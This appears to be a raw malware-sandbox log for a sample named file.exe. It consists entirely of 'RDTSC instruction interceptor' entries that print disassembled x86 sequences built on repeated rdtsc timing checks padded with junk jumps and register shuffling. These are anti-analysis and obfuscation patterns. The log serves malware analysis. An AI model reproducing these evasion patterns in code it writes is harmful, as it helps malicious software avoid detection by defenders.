Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC06E0 second address: 4AC06E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC06E6 second address: 4AC06EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC06EC second address: 4AC0793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC51833Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov edx, esi 0x00000010 pushfd 0x00000011 jmp 00007F29FC51833Ah 0x00000016 sub esi, 1A467E28h 0x0000001c jmp 00007F29FC51833Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F29FC518344h 0x0000002b xor cx, 3088h 0x00000030 jmp 00007F29FC51833Bh 0x00000035 popfd 0x00000036 popad 0x00000037 push eax 0x00000038 jmp 00007F29FC518344h 0x0000003d xchg eax, ecx 0x0000003e jmp 00007F29FC518340h 0x00000043 xchg eax, esi 0x00000044 jmp 00007F29FC518340h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F29FC51833Dh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0793 second address: 4AC0797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0797 second address: 4AC079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC079D second address: 4AC0839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29FCD4346Ah 0x00000009 sbb ch, FFFFFFA8h 0x0000000c jmp 00007F29FCD4346Bh 0x00000011 popfd 0x00000012 mov esi, 59BD4E9Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b jmp 00007F29FCD43472h 0x00000020 lea eax, dword ptr [ebp-04h] 0x00000023 jmp 00007F29FCD43470h 0x00000028 nop 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F29FCD4346Eh 0x00000030 jmp 00007F29FCD43475h 0x00000035 popfd 0x00000036 movzx ecx, di 0x00000039 popad 0x0000003a push eax 0x0000003b jmp 00007F29FCD4346Ah 0x00000040 nop 0x00000041 jmp 00007F29FCD43470h 0x00000046 push dword ptr [ebp+08h] 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov esi, edi 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0839 second address: 4AC083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC088C second address: 4AC0890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0890 second address: 4AC08AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC08AD second address: 4AC08B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC08B3 second address: 4AC08B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0953 second address: 4AC0957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0957 second address: 4AC095B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC095B second address: 4AC0961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0961 second address: 4AC0967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0967 second address: 4AC096B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC096B second address: 4AC000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c cmp eax, 00000000h 0x0000000f setne al 0x00000012 xor ebx, ebx 0x00000014 test al, 01h 0x00000016 jne 00007F29FC518337h 0x00000018 xor eax, eax 0x0000001a sub esp, 08h 0x0000001d mov dword ptr [esp], 00000000h 0x00000024 mov dword ptr [esp+04h], 00000000h 0x0000002c call 00007F2A00515A93h 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 mov al, B3h 0x00000036 push eax 0x00000037 push edx 0x00000038 mov ebx, 5C9BBE2Ah 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC000C second address: 4AC0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0010 second address: 4AC0047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007F29FC518349h 0x00000010 pop ecx 0x00000011 jmp 00007F29FC518341h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0047 second address: 4AC004D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC004D second address: 4AC0051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0051 second address: 4AC00C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43473h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F29FCD43476h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F29FCD43470h 0x0000001a push FFFFFFFEh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F29FCD43478h 0x00000025 sbb ecx, 55FC0A68h 0x0000002b jmp 00007F29FCD4346Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC00C6 second address: 4AC0129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 4FA6A50Ch 0x0000000d pushad 0x0000000e pushad 0x0000000f call 00007F29FC518345h 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F29FC518341h 0x0000001b jmp 00007F29FC51833Bh 0x00000020 popfd 0x00000021 popad 0x00000022 popad 0x00000023 xor dword ptr [esp], 3A0C3B44h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F29FC518345h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0129 second address: 4AC012F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC012F second address: 4AC0133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0133 second address: 4AC017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F29FCD43469h 0x0000000d pushad 0x0000000e movsx ebx, cx 0x00000011 mov dh, cl 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F29FCD43478h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f call 00007F29FCD43471h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC017C second address: 4AC01EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F29FC518348h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F29FC51833Ch 0x0000001c adc cx, 2BD8h 0x00000021 jmp 00007F29FC51833Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F29FC518348h 0x0000002d or cx, 7638h 0x00000032 jmp 00007F29FC51833Bh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC01EE second address: 4AC0205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, CEh 0x00000005 movzx esi, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, 4E429A7Bh 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0205 second address: 4AC0244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC51833Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f jmp 00007F29FC51833Eh 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F29FC518347h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0244 second address: 4AC0273 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d call 00007F29FCD4346Dh 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0273 second address: 4AC029E instructions: 0x00000000 rdtsc 0x00000002 mov bh, DFh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 mov ax, bx 0x0000000a pop ebx 0x0000000b popad 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edx, ax 0x00000013 call 00007F29FC518346h 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC029E second address: 4AC02D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F29FCD4346Eh 0x00000008 pop ecx 0x00000009 mov cl, dl 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e sub esp, 18h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F29FCD43474h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC02D0 second address: 4AC02D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC02D4 second address: 4AC02DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC02DA second address: 4AC0365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b jmp 00007F29FC518340h 0x00000010 movzx esi, dx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 mov esi, 5346ED49h 0x0000001b mov eax, 7B881505h 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 jmp 00007F29FC518340h 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 mov eax, 71D6322Dh 0x0000002e pushfd 0x0000002f jmp 00007F29FC51833Ah 0x00000034 and ax, 82C8h 0x00000039 jmp 00007F29FC51833Bh 0x0000003e popfd 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007F29FC518349h 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F29FC51833Dh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0365 second address: 4AC036B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC036B second address: 4AC036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC036F second address: 4AC03CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F29FCD43474h 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F29FCD4346Eh 0x00000018 add esi, 2CFF19E8h 0x0000001e jmp 00007F29FCD4346Bh 0x00000023 popfd 0x00000024 call 00007F29FCD43478h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC03CB second address: 4AC0440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [75AB4538h] 0x0000000b pushad 0x0000000c mov eax, edx 0x0000000e mov edx, 5F503E8Ch 0x00000013 popad 0x00000014 xor dword ptr [ebp-08h], eax 0x00000017 jmp 00007F29FC51833Bh 0x0000001c xor eax, ebp 0x0000001e pushad 0x0000001f pushad 0x00000020 jmp 00007F29FC51833Bh 0x00000025 popad 0x00000026 mov esi, ebx 0x00000028 popad 0x00000029 push esi 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F29FC51833Ch 0x00000031 add esi, 634CE108h 0x00000037 jmp 00007F29FC51833Bh 0x0000003c popfd 0x0000003d popad 0x0000003e mov dword ptr [esp], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F29FC518347h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0440 second address: 4AC0446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0446 second address: 4AC0498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518344h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F29FC518340h 0x00000011 mov dword ptr fs:[00000000h], eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F29FC51833Ch 0x00000020 sbb ax, D828h 0x00000025 jmp 00007F29FC51833Bh 0x0000002a popfd 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0498 second address: 4AC04FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F29FCD4346Fh 0x0000000a add si, E96Eh 0x0000000f jmp 00007F29FCD43479h 0x00000014 popfd 0x00000015 popad 0x00000016 mov dword ptr [ebp-18h], esp 0x00000019 pushad 0x0000001a jmp 00007F29FCD4346Ch 0x0000001f mov ecx, 25F1BF01h 0x00000024 popad 0x00000025 mov eax, dword ptr fs:[00000018h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F29FCD43473h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC04FD second address: 4AC0541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29FC51833Fh 0x00000009 add si, 84DEh 0x0000000e jmp 00007F29FC518349h 0x00000013 popfd 0x00000014 mov bl, cl 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ecx, dword ptr [eax+00000FDCh] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push esi 0x00000023 pop edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0541 second address: 4AC0546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0546 second address: 4AC0578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518347h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b pushad 0x0000000c mov ecx, 35C22F9Bh 0x00000011 mov ah, 2Ah 0x00000013 popad 0x00000014 jns 00007F29FC51837Dh 0x0000001a pushad 0x0000001b pushad 0x0000001c mov eax, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0578 second address: 4AC05C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov di, 7114h 0x00000009 popad 0x0000000a add eax, ecx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F29FCD43479h 0x00000013 add cx, 2086h 0x00000018 jmp 00007F29FCD43471h 0x0000001d popfd 0x0000001e mov ebx, ecx 0x00000020 popad 0x00000021 mov ecx, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push ebx 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC05C2 second address: 4AC05C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC05C8 second address: 4AC05CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC05CC second address: 4AC05D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB003F second address: 4AB0045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0045 second address: 4AB007A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC51833Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F29FC51833Ch 0x00000014 sub si, 5708h 0x00000019 jmp 00007F29FC51833Bh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB007A second address: 4AB00EB instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a mov bh, 99h 0x0000000c popad 0x0000000d popad 0x0000000e sub esp, 2Ch 0x00000011 jmp 00007F29FCD43478h 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 mov cx, di 0x0000001c pop edx 0x0000001d pushfd 0x0000001e jmp 00007F29FCD43476h 0x00000023 and ecx, 7AAE36F8h 0x00000029 jmp 00007F29FCD4346Bh 0x0000002e popfd 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F29FCD43474h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB00EB second address: 4AB0155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC51833Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F29FC518346h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F29FC518340h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bx, si 0x0000001c pushfd 0x0000001d jmp 00007F29FC518348h 0x00000022 sub esi, 3A247548h 0x00000028 jmp 00007F29FC51833Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0382 second address: 4AB0386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0386 second address: 4AB038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB038A second address: 4AB0390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0390 second address: 4AB0396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB03BF second address: 4AB03C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB03C5 second address: 4AB0417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC51833Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F2A6D4C63E9h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, di 0x00000017 pushfd 0x00000018 jmp 00007F29FC518349h 0x0000001d adc si, B9C6h 0x00000022 jmp 00007F29FC518341h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0417 second address: 4AB048F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F29FCD434D1h 0x0000000f pushad 0x00000010 mov dh, ch 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F29FCD4346Fh 0x00000019 or ah, FFFFFFAEh 0x0000001c jmp 00007F29FCD43479h 0x00000021 popfd 0x00000022 movzx esi, bx 0x00000025 popad 0x00000026 popad 0x00000027 cmp dword ptr [ebp-14h], edi 0x0000002a pushad 0x0000002b jmp 00007F29FCD43474h 0x00000030 popad 0x00000031 jne 00007F2A6DCF1480h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov cl, dl 0x0000003c mov edx, eax 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB048F second address: 4AB0495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0495 second address: 4AB0566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F29FCD43475h 0x00000012 pushfd 0x00000013 jmp 00007F29FCD43470h 0x00000018 or si, 0F18h 0x0000001d jmp 00007F29FCD4346Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov bx, cx 0x00000027 popad 0x00000028 lea eax, dword ptr [ebp-2Ch] 0x0000002b jmp 00007F29FCD43472h 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F29FCD4346Eh 0x00000038 adc cl, FFFFFFA8h 0x0000003b jmp 00007F29FCD4346Bh 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007F29FCD43478h 0x00000047 and eax, 654DA308h 0x0000004d jmp 00007F29FCD4346Bh 0x00000052 popfd 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 mov si, dx 0x00000059 mov ax, dx 0x0000005c popad 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 call 00007F29FCD43476h 0x00000066 pop ecx 0x00000067 mov eax, edi 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0DC4 second address: 4AA0DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0DCA second address: 4AA0E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov cl, C8h 0x0000000c mov esi, ebx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F29FCD43478h 0x00000017 sub eax, 6C7175B8h 0x0000001d jmp 00007F29FCD4346Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 pushfd 0x00000027 jmp 00007F29FCD43474h 0x0000002c sbb si, 3018h 0x00000031 jmp 00007F29FCD4346Bh 0x00000036 popfd 0x00000037 popad 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a pushad 0x0000003b pushad 0x0000003c mov cx, 61E1h 0x00000040 mov di, ax 0x00000043 popad 0x00000044 mov edi, eax 0x00000046 popad 0x00000047 mov ebp, esp 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov dx, E624h 0x00000050 mov di, 4090h 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0E4D second address: 4AA0E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0E53 second address: 4AA0E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
